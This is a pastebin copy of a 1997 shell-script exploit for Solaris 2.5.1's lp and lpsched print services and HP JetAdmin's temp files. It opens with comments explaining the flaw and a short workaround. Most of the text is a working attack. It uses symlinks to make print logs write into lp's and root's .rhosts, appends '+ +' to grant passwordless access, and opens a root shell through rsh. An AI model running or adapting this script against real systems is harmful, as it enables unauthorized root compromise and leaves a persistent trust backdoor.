Advertisement
FlyFar

Solaris 2.5.1 lp / lpsched - Symlink

Feb 25th, 2024
1,103
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 4.81 KB | Cybersecurity | 0 0
  1. #!/bin/sh
  2. #
  3. # lpNet & temp file exploit:
  4. #   break lp, then use lp priv to break root (or bin, etc...).
  5. #
  6. #   Written by: Chris Sheldon (csh@viewgraphics.com)
  7. #
  8. #   Tested on Solaris-2.5.1:
  9. #     SunOS testhost 5.5.1 Generic sun4m sparc SUNW,SPARCstation-20
  10. #
  11. #   Caveat: This system is running without patches. Sun released
  12. #     patch 103959-03 for 2.5.1 on Feb 27, 1997. lpNet and lpsched
  13. #     were replaced in that patch, but the patch README does not
  14. #     mention anything about a temp file or permissions problem.
  15. #     103959-03 is in the recommended patch list, but not in the
  16. #     "Patches containing security fixes" list.
  17. #
  18. #   This way (not using HP JetAdmin) *seems* to only work when you have
  19. #   a postscript-only defined printer. If you send an ascii job to the
  20. #   print queue, lpNet will invoke several of the /usr/lib/lp/postscript
  21. #   programs to convert the ascii into postscript. One of them, postio(1),
  22. #   creates a temp file in /var/tmp mode 666. If the request is sent from
  23. #   a remote system (eg. handled by lpNet), then postio(1) runs as lp and
  24. #   creates /var/tmp/<printer-name>.log as lp mode 666.
  25. #
  26. #   Here's part of the /var/lp/logs/request file:
  27. #
  28. #   = lp0-71, uid -1, gid -1, size 123, Sat May  3 03:26:14 PDT 1997
  29. #   x /usr/lib/lp/postscript/postprint
  30. #   y /usr/lib/lp/postscript/download -plp0|/usr/lib/lp/postscript/postio \
  31. #       2>>$ERRFILE -L/var/tmp/lp0.log
  32. #   t simple
  33. #
  34. #   What if you don't have a PS-only printer? Well, if you are using
  35. #   the HP JetAdmin software and are running the hpnp daemon, then
  36. #   you're just as vulnerable. The JetAdmin software creates a temp
  37. #   file /var/tmp/jadump as lp with mode 666. It's happily follows
  38. #   symlinks.
  39. #
  40. #   So, then exploit essentially is:
  41. #     ln -s ~lp/.rhosts /var/tmp/<printer-name.log>
  42. #      -or-
  43. #     ln -s ~lp/.rhosts /var/tmp/jadump
  44. #     rsh somehost lp somefile.txt
  45. #     echo "+ +" >> ~lp/.rhosts
  46. #     rsh -l lp localhost /bin/sh -i
  47. #     mv /var/lp/logs/lpsched /var/lp/logs/lpsched.save
  48. #     ln -s /.rhosts /var/lp/logs/lpsched
  49. #     /usr/sbin/lpshut
  50. #     /usr/lib/lpsched
  51. #     mv /var/lp/logs/lpsched.save /var/lp/logs/lpsched
  52. #     echo "+ +" >> /.rhosts
  53. #     rsh -l root localhost /bin/sh -i
  54. #
  55. #  Note: This won't clobber the permissions on an existing /.rhosts
  56. #    file, but you can always symlink to /usr/bin/.rhosts.
  57. #
  58. #  Workaround:
  59. #    Put "umask 022" in /etc/init.d/lp. /var/tmp/<printer-name>.log
  60. #      will be mode 644. This also makes /var/lp/logs/lpsched
  61. #      created as mode 644.
  62. #    For /var/tmp/jadump, the umask trick didn't work. I just made
  63. #    /usr/spool/lp 755 root/root (was 775 lp/lp).
  64. #
  65. #  I suppose as a general principal, it's a good thing to go around
  66. #  as root and touch /.rhosts /usr/bin/.rhosts /usr/spool/lp/.rhosts
  67. #  and /var/adm/.rhosts as 600 root/root. I also run a script which
  68. #  checks the files (and their contents) on a regular basis.
  69. #
  70. #  Perhaps there should be a file called /etc/rusers which, like the
  71. #  /etc/ftpusers file, denies any user in that file password-less
  72. #  r-service access.
  73. #
  74. #  Of course, you still have to worry about things like .forward.
  75. #  A more draconian approach would be to change /var/spool/lp to
  76. #  mode 755 and owned by root. What would this break?? (anything?)
  77. #
  78. #  This is the JetAdmin/hpnpd script:
  79. #
  80.  
  81. #
  82. # Usage stuff.
  83. if [ "$1" = "" ]; then
  84.   echo "Usage: lp-exp <remote-host> [remote printer name]"
  85.   echo "         remote-host: host must have networked printer"
  86.   echo "           with the main spool on the local system."
  87.   exit
  88. else
  89.   remlp=$1
  90. fi
  91.  
  92. #
  93. # Specify a different queue
  94. if [ "$2" != "" ]; then
  95.   remqn=$2
  96. fi
  97.  
  98. #
  99. # Check for ~lp/.rhosts
  100. if [ -f /usr/spool/lp/.rhosts ]; then
  101.   echo "lp's .rhosts file exists... sorry"
  102.   exit
  103. fi
  104.  
  105. #
  106. # Check if hpnpd is running
  107. if [ "`ps -e | grep hpnpd`" != "" ]; then
  108.   echo "found hpnpd running"
  109.   rm -f /var/tmp/jadump
  110.   ln -s /usr/spool/lp/.rhosts /var/tmp/jadump
  111. else
  112.   echo "If you have a postscript only printer, try that (see comments)."
  113.   exit
  114. fi
  115.  
  116. #
  117. # print some data on a remote system
  118. if [ "$remlp" = "" ]; then
  119.   rsh $remlp "echo ASCII-STRING | lp"
  120. else
  121.   rsh $remlp "echo ASCII-STRING | lp -d$remqn"
  122. fi
  123.  
  124. sleep 3
  125.  
  126. #
  127. # Check for the new .rhosts file and break root
  128. if [ -f /usr/spool/lp/.rhosts ]; then
  129.   rm -f /var/tmp/jadump
  130.   echo "+ +" >> /usr/spool/lp/.rhosts
  131.  
  132.   rsh -l lp localhost "rm /usr/spool/lp/.rhosts ;\
  133.    mv /var/lp/logs/lpsched /var/lp/logs/lpsched.save ;\
  134.    ln -s /.rhosts /var/lp/logs/lpsched ;\
  135.    /usr/sbin/lpshut ;\
  136.    sleep 3 ;\
  137.    /usr/lib/lpsched ;\
  138.    mv /var/lp/logs/lpsched.save /var/lp/logs/lpsched ;\
  139.    echo \"+ +\" >> /.rhosts"
  140. else
  141.   echo "Hmmm... no .rhosts file was created."
  142.   exit
  143. fi
  144.  
  145. rsh -l root localhost /bin/sh -i
  146.  
  147. #
  148. #
  149. #
  150.  
  151. # milw0rm.com [1997-05-03]
  152.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement